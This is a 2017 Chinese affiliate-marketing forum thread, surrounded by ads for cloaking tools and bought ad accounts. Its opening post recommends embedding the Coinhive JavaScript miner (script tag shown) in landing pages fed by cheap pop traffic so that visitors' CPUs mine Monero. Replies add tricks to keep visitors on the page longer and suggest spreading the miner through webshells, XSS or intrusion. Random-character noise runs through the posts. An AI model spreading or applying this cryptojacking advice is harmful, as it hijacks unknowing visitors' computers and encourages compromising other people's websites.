AdvertCN - 广告中国

QQ登录

只需一步,快速开始

谷歌+Bing+TT+MSN官方代理 
⚡️按条S5代理⚡️静态⚡️独享⚡️5G⚡️最干净<Wifi住宅+5G移动>IP代理泰国仓储,本土仓发货2-3元/单
指纹浏览器,就用AdsPower谷歌/FB/Bing/Yahoo代理商开户7200W全球动态不重复住宅IP代理全球优质流量,选TrafficStars
出售Facebook,友缘号,FB广告号,insFB/TT/KW 加白开户ADPLEXITY + ADVERTCN比Adplexity还好用的Spy工具
广
FB/Google/TK海外多媒体极速下户
BINOM TRACKER 60% OFF!MediaGo+Taboola+Ob开户百度国际MediaGo⚡️让产品狂奔全球百度国际,高点击转化,快速放量
百度国际MediaGo,独家原生流量虚拟信用卡+独立站收款行业首创新型指纹Cloak, 谷歌奇效!Kookeey⚡️100%独享⚡️原生住宅IP
⚡IPFoxy住宅代理全场88折⚡全球虚拟卡, 支持U充值免账户投放 FB 广告(送项目)2024做什么 - Media buy 项目库
免费黑五教程(持续更新、欢迎交流)Facebook 批量上广告Bridgeway - 联盟营销网络IPCola 全新住宅代理 ⚡️ 免费试用
各种主页、账单户、BM户(优势)⚡️个人户,bm户不限额,账单户Adsterra 的CPA/CPM/CPC 网站流量在线注册美国/英国/香港等海外公司
EU KETO/CBD - JumbleberryFB二三解1元/个9Proxy ⚡️ $0.04/IP, 无限带宽 cloak斗篷/ss/nutra/cpa/Dating
E.PN 虚拟卡Asocks代理服务器$3/GB高薪诚求实力FB投手(独立站)《全新虚拟卡+全球收付款》
广告位出租全球低价纯净住宅/移动IP-免费试用广告代投, 东南亚物流, 虚拟信用卡VMLogin指纹浏览器+多账号防关联

[业界] N年不见的礼物,适合玩站、Media Buy等等...........

广告币

初级会员

adsterra
! `+ l( ]$ ?8 I/ H" R/ j9 H6 z0 r2 s( y, w( ~
老朋友们,新朋友们,好久不见了!转行投身“虚拟币”行当了,好久不来了,不知道现在大家都怎么样了呢?
) {5 _6 T0 @! @2 X) v3 A, l其实,有的时候挺怀念AFF那些年呢!曾经一起战斗的兄弟,你们还好吗?(呵呵!是不是太煽情了?)
$ n& ~/ u  y  u& N- Q/ ^3 B& ~好了,言归正传吧!(再说下去,我真掉眼泪了啊)
( d- {( b7 ?9 N/ r今天推荐的项目 就是一段JS代码) {2 h$ y6 U- _7 b
# {# F* A9 m2 [$ \; x! x# d0 T
网址:https://coinhive.com  # O7 U/ g  i& ^2 L4 i- u
< script src = “https://coinhive.com/lib/coinhive.min.js” > < / script >  c6 E, h3 x2 b
前段时间,海盗湾都挂的这个JS代码呢,太火爆了!6 p7 s7 n6 i/ c$ U- C: r: \! D5 x

' E5 Z, _+ U8 h" Z- DJS代码挖门罗币,目前国内门罗币价格区间是:1个币=520元-550元(价格随时波动),国外交易价格区间:一个币=90USD-100USD(价格随时波动)
) V; S# n7 \, }% o4 m3 U5 f# g3 H至于什么是门罗币,百度自行脑补。" D# n& O! z- r) K5 f
后台生成短链接 分享出去 就能挖矿,也可以自己编辑JS代码或者API都行!8 ~& ]$ c2 r5 a2 \  I2 a0 R
至于怎么快速挖矿,亲测 “Popads” 可行呢,买最便宜的PC流量,LP加载JS代码,算力速度杠杠滴!玩法还有很多,希望给大家一些提示吧!
) d2 Q$ ~' X+ s' H* f' f
7 w- C& q* f- X  T/ B' ?, J9 E2 y8 M2 Y

8 A2 B" Q! r( [

评分

lailailai + 2 很给力!
eric205013 + 2 很给力!
勇之助 + 2 很给力!
ma7k + 2 神马都是浮云
1198345 + 2 出来冒泡了
妖妖 + 5 NB!
centos + 5 NB!

相关帖子

广告币

初级会员

billy 发表于 2017-10-9 02:11$ x3 Y) q/ H3 q% y8 O5 r6 w
你试过么?盈利了么?: B& E9 g+ H! h( R' X6 y# b1 |
门罗币用cpu挖矿,买流量没有停留时间,入不敷出是一定的了~ ...
4 M+ s4 e) U- o: `$ U% g
你可以这样啊 ,LP代码设置 关闭弹出消息提醒和网页自动缩放代码,延长用户关闭LP的时间
5 P9 O4 Q. p  _- x6 `至于JS代码后台 你设置成 最小哈希值,至于流量,POP你选 印度 土耳其  巴西  墨西哥 ,设置最低出价比例
回复 支持 1 反对 0

广告币

初级会员

专业玩家 发表于 2017-10-9 17:453 y6 u5 B+ N" K2 h9 `- D% }
如果我有几百万,之前炒房。。。。 现在至少1,2千万身家。。 有1,2千万以上身家。。之前应该开个 币。 ...

8 w& [# K& \/ k在说下。山西太原 房子谁炒谁就死,我跟你说下 山西经济的主要架构吧7 r  e8 s3 f' ]2 t2 i7 Q
煤矿  汾酒  土特产  旅游   其他都经济产业 几乎可以忽略不计!* K$ i6 v3 }/ F" y, f3 A9 l
都说山西煤老板多,你理解错了,几乎赚钱的煤矿,幕后都是外地人投资入股的
% p9 H+ V" Z. S本地煤老板 挣了钱 都不在山西这地方待 都去一线城市发展了!
* f8 ]! k( p) C1 |% ~  N汾酒  基本都是从 东北地区 进高度白酒 然后勾兑,咱国内的白酒 几乎很多都是勾兑酒,这你可以问问你们当地酒厂就明白!
* v# M/ X1 X7 l  F  N土特产和旅游 也是最近几年才发展起来的!也是山西省政府目前大力打造的旅游牌7 ]- d- R+ o" x' L6 p1 p

0 H. P3 A, M- N( {至于山西太原 这个城市  几乎没有互联网人才的基因,我15年找 java语言程序员 本地几乎没有,面试了几个,都是半吊子选手,最后我无奈 只能外包给 北京的一家公司!这就是现状!!!
3 K' m) i' K6 L6 p5 }比如 深圳  找程序员一找一大把 ,技术水平都蛮高的,哪怕是 西北市场 西安都很容易找的到!+ w$ r& C+ |/ C) c+ L2 B
说了这么多,我只想说明一个道理,任何项目 这两年想做大 必须有团队 ,但山西太原 ,人都找不齐,我去火星上 炒房和开币呢?

赚钱应该转移到深圳比较不错。。。 现在CPA也不太好跑,深圳搞跨境依旧有气氛,技术各方面的优势。。 深圳的房2,3年内涨了2,3倍以上。。。  详情 回复 发表于 2017-10-9 19:31
回复 支持 1 反对 0

广告币

超级版主

酱油党

社区QQ达人

本帖最后由 billy 于 2017-10-9 02:10 编辑 % {1 ~/ F  h( K/ k  R/ Y/ |

]# N1 E% V8 X试过几天,1万ip也就合人民币几块钱,比pop差远了~除非是那种一直在线的视频站,可能收入能高些~' A& n4 @& ^% \7 l1 `6 F0 Y3 X

你买最便宜的国家啊  详情 回复 发表于 2017-10-9 02:10

广告币

初级会员

billy 发表于 2017-10-9 02:09
5 d# G! @5 f3 z4 `8 [4 q) u' L试过几天,1万ip也就合人民币几块钱,比pop差远了~
) d1 j4 a! J/ W
你买最便宜的国家啊

你试过么?盈利了么?  详情 回复 发表于 2017-10-9 02:11

广告币

超级版主

酱油党

社区QQ达人

花儿、对我笑 发表于 2017-10-9 02:10- ?4 w" p9 g: M
你买最便宜的国家啊

2 S9 ]! X: u/ m
" u0 ^% p5 s9 X9 J你试过么?盈利了么?  V; O( w4 W, e% L3 x% r
门罗币用cpu挖矿,买流量没有停留时间,入不敷出是一定的了~

你看看这情况,不盈利的项目,我是不会发布的,熟悉我的战友,都了解我! 要么就不说项目,要说就必定是盈利的项目! 非要我把具体国家流量所出来呢,估计过几天这些国家 流量价格飞涨!  详情 回复 发表于 2017-10-9 02:31
你可以这样啊 ,LP代码设置 关闭弹出消息提醒和网页自动缩放代码,延长用户关闭LP的时间 至于JS代码后台 你设置成 最小哈希值,至于流量,POP你选 印度 土耳其 巴西 墨西哥 ,设置最低出价比例  详情 回复 发表于 2017-10-9 02:28
我目前自己有矿场呢,JS代码肯定比不了专门的挖矿软件,但思路可以举一反三么,比如,正规搞:站群,买流量,各种”福利“等等 ,黑产搞:webshell ,XSS等等,可以利用的方法太多了,大家开动脑筋吧  详情 回复 发表于 2017-10-9 02:16

广告币

初级会员

billy 发表于 2017-10-9 02:11' b! C7 r% ^  n* R+ a" W: Z
你试过么?盈利了么?
1 F9 q: l0 F0 `; A2 U& b3 g5 U7 `+ f
我目前自己有矿场呢,JS代码肯定比不了专门的挖矿软件,但思路可以举一反三么,比如,正规搞:站群,买流量,各种”福利“等等 ,黑产搞:webshell ,XSS等等,可以利用的方法太多了,大家开动脑筋吧

广告币

初级会员

billy 发表于 2017-10-9 02:11! i; o3 U$ g  t6 D9 h% u
你试过么?盈利了么?
: }& t7 o' Z2 W9 S5 f门罗币用cpu挖矿,买流量没有停留时间,入不敷出是一定的了~ ...
- h& z+ H5 f! C+ P! R
你看看这情况,不盈利的项目,我是不会发布的,熟悉我的战友,都了解我!
" ]% t$ N! Y# x/ i4 Q1 x要么就不说项目,要说就必定是盈利的项目!* ], f8 ^+ f- ]2 Y1 \; j% Q
非要我把具体国家流量说出来呢,估计过几天这些国家 流量价格飞涨!

广告币

初级会员

如果大家想专门购置机器 挖矿的话+ k0 D8 N* s+ I# g( {+ @) e
按照 这个算力网站 组装矿机 http://monerobenchmarks.info/ J" E4 T- [# @7 y! _' j' z
配件参考价格区间(一律二手货)$ u& a" L0 h% o
硬盘 可有可无 80G 25元 (可无盘系统)9 W# \  b8 d. p5 ~
电源 300W 55元5 w& v1 l4 d/ O
内存 DDR800 2G 35元(挖门罗不吃内存 1G都可以挖): F" ]1 o2 ?6 ~7 R9 q
主板 50-80元
2 ^5 G) Z7 o  O4 J" I6 Q9 KCPU 风扇  60元; D7 `- Y/ i) \, ^) S
CPU 按照需求 自选价格6 L5 K+ d4 {4 c7 `* w: c! [! P3 n
这只是小批量矿机价格7 l: q: G  ]! n' R
大批量的话  CPU E5  双路主板 整机价格区间 900元-1500元: q  t8 d! B9 j& I
显卡机 挖门罗币 不合算呢!

广告币

高级会员

社区QQ达人

是几年前出EMU 培训的 花儿对我笑大神吗?   当时应该一年轻松赚几百万吧。。。玩这些对你来说太低端了

http://ww1.sinaimg.cn/large/0060lm7Tly1fkbzftga5cj30dd0fgdgs.jpg对不起,我们不允许远程图片. 请将图片上传到论坛 瞎玩吧,关键是挖矿根本不需要考虑AFF行业里的麻烦事(联盟的脸色 广告商的脸色) 矿机一开,根  详情 回复 发表于 2017-10-9 14:38
一点都不低端啊,“虚拟币”行当,其实就跟咱这圈子有点像,有新司机,也有老司机,JS代码这项目 特性就适合批量,规模试的搞,里面赚钱道道也挺多呢,我只是分享了“冰山一角”呢,比如 国内价格低 收币买卖,倒手  详情 回复 发表于 2017-10-9 14:13
pionex最强加密币自动,傻瓜量化交易平台 - 注册送30美元  https://www.pionex.cc/zh-CN/sign/ref/VaXNR1IG

广告币

超级版主

太原叮总.
已有 1 人评分          广告币    理由
河小马      + 1000

广告币

中级会员

一不小心见到大神了?

广告币

高级会员

社区QQ达人

我就是想简单的知道,怎么控制CPU,代码怎么添加。我找不到修改的方法..

广告币

中级会员

社区QQ达人

! O" `  ]4 W2 J. K! j2 C
门罗现在也可以GPU 挖矿啊! d# t# b8 [1 |: ^7 {
如果免费流量或者入侵的搞搞 有点赚头+ _7 f$ e/ H, p4 d1 w7 {5 f1 M
买流量做这个 感觉要亏6 y1 D3 C* b/ s
大概看了下 1024 Hashes 有 0.00000015 XMR
% q: _, T% e3 Z/ p0 c0 q9 w9 b假设1万IP 每个都做到1024 (我自己 E5-2670 8核16线程  32G 内存 页面用了40秒) 这个应该比较高了吧
7 b4 d1 u' V% d% K1 O也就 0.0015 XMR 价值 0.75元& z  H$ j# h) |
还不如卖显卡 做矿机
! b# E  Y; t% T9 X! F1 Z

这些问题 ,挖矿那个圈子,成天有人讨论呢,最后都选择CPU矿机挖矿 为什么呢?就是因为显卡挖门罗币,损耗大 维护成本高,比如6卡 1060挖门罗 根本不划算,还不如挖以太币呢.  详情 回复 发表于 2017-10-9 14:17

评分

妖妖 + 5 NB!

广告币

初级会员

专业玩家 发表于 2017-10-9 06:14
* s; s3 M0 K. V! A, _是几年前出EMU 培训的 花儿对我笑大神吗?   当时应该一年轻松赚几百万吧。。。玩这些对你来说太低端了 ...
8 S' G& t' Q% N0 q
一点都不低端啊,“虚拟币”行当,其实就跟咱这圈子有点像,有新司机,也有老司机,JS代码这项目 特性就适合批量,规模试的搞,里面赚钱道道也挺多呢,我只是分享了“冰山一角”呢,比如 国内价格低  收币买卖,倒手卖到国外交易平台,简单暴利,就说这么多吧.

广告币

初级会员

生鱼片 发表于 2017-10-9 09:16
# f2 y3 J' g; r* m. ]$ s+ n门罗现在也可以GPU 挖矿啊0 y6 N7 f1 c$ [+ u5 F# O
如果免费流量或者入侵的搞搞 有点赚头) o7 A  Z, A/ q& m" [. b' I& c
买流量做这个 感觉要亏

0 }& u5 o9 f" e7 X' _: Y+ m这些问题 ,挖矿那个圈子,成天有人讨论呢,最后都选择CPU矿机挖矿1 Y  K2 \3 ~7 b$ @" l- R/ q% x; U
为什么呢?就是因为显卡挖门罗币,损耗大 维护成本高,比如6卡 1060挖门罗# I0 F; e) z5 z8 w7 K* D% p! q  m
根本不划算,还不如挖以太币呢.

还不如屯比特币 以后比特币才是硬通货了 等国内几大平台 海外重新搞起来 都是币币交易了  详情 回复 发表于 2017-10-9 14:33